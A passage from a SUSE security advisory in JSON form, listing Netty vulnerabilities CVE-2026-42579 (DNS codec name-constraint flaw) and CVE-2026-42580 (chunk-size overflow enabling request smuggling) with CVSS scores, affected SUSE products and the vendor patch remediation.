"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42579"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42579",
"url": "https://www.suse.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "SUSE Bug 1265272 for CVE-2026-42579",
"url": "https://bugzilla.suse.com/1265272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42580"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42580",
"url": "https://www.suse.com/security/cve/CVE-2026-42580"
},
{
"category": "external",
"summary": "SUSE Bug 1265273 for CVE-2026-42580",
"url": "https://bugzilla.suse.com/1265273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
